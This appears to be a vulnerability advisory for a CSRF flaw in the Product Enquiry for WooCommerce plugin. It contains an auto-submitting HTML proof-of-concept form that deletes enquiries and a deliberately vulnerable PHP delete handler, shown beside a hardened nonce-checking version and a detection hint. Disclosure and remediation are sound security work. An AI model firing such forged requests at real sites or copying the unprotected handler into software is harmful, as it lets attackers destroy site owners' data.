wpexploit | Bob Matyas | WPEX-ID: D483F7CE-CB3F-4FCB-B060-005CEC0EA10F
History: Dec 28, 2023 - 12:00 a.m.

Product Enquiry for WooCommerce < 3.1 - Arbitrary Enquiry Deletion via CSRF

2023-12-28 00:00:00
Bob Matyas
38
Tags: product enquiry, woocommerce, csrf, exploit, security

AI Score: 6.7 Medium (Confidence: Low)
EPSS: 0.0005 Low (Percentile: 17.1%)

Description

The plugin does not have a CSRF check in place when deleting enquiries, which could allow attackers to make a logged-in admin delete them via a CSRF attack.

1. Make an enquiry from the frontend form
2. Go to "Woo Quote Popup > Enquiry List"
3. Get the ID of an item
4. Add the ID to the following HTML:

```html
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=GMWQP&view=list" method="POST">
        <input type="text" name="action" value="delete">
        <input type="text" name="action2" value="delete">
        <input type="text" name="page" value="GMWQP">
        <input type="text" name="_wp_http_referer" value="%2Fwp-admin%2Fadmin.php%3Fpage%3DGMWQP%26view%3Dlist">
        <input type="text" name="id[]" value="__ADD_ID_HERE__">
        <input type="submit" value="submit">
    </form>
</body>
```
5. See that the item has been deleted.
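As an added illustration (my own hypothetical PHP, not the plugin's code), here is the shape of a bulk-delete handler that accepts the PoC above beside a hardened one that requires the WP_List_Table bulk-action nonce and a capability check before touching the database. The `gmwqp_` function prefix, the `bulk-enquiries` nonce action, the table name and the `manage_woocommerce` capability are assumptions.

```php
<?php
// Hypothetical reconstruction, not the plugin's own code. Both handlers run on
// admin.php?page=GMWQP&view=list and read the POST fields the PoC sends:
// action, action2 and id[].

function gmwqp_current_action() {
    // WP_List_Table semantics: top (action) or bottom (action2) bulk dropdown.
    if ( ! empty( $_POST['action'] ) && '-1' !== $_POST['action'] ) {
        return sanitize_key( $_POST['action'] );
    }
    if ( ! empty( $_POST['action2'] ) && '-1' !== $_POST['action2'] ) {
        return sanitize_key( $_POST['action2'] );
    }
    return false;
}

// Vulnerable shape: any POST carrying action=delete is honoured as long as the
// browser attaches the admin's session cookies, which a cross-site form does.
function gmwqp_handle_bulk_delete_vulnerable() {
    global $wpdb;
    if ( 'delete' !== gmwqp_current_action() ) {
        return;
    }
    foreach ( (array) $_POST['id'] as $id ) {
        $wpdb->delete( $wpdb->prefix . 'gmwqp_enquiries', array( 'id' => (int) $id ) );
    }
}

// Hardened shape: the list table's form must carry wp_nonce_field( 'bulk-enquiries' )
// (the assumed $plural argument); a cross-site page cannot read that nonce, so
// check_admin_referer() calls wp_die() before any row is deleted.
function gmwqp_handle_bulk_delete_fixed() {
    global $wpdb;
    if ( 'delete' !== gmwqp_current_action() ) {
        return;
    }
    if ( ! current_user_can( 'manage_woocommerce' ) ) {
        wp_die( esc_html__( 'You are not allowed to delete enquiries.', 'gmwqp' ), '', array( 'response' => 403 ) );
    }
    check_admin_referer( 'bulk-enquiries' ); // verifies _wpnonce, dies on failure
    $ids = array_map( 'absint', (array) ( $_POST['id'] ?? array() ) );
    foreach ( $ids as $id ) {
        if ( $id > 0 ) {
            $wpdb->delete( $wpdb->prefix . 'gmwqp_enquiries', array( 'id' => $id ), array( '%d' ) );
        }
    }
}
```

For detection, a delete request on this admin page whose POST body lacks a `_wpnonce` field (the PoC form sends none) is the signature of the cross-site path rather than a legitimate list-table submission.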

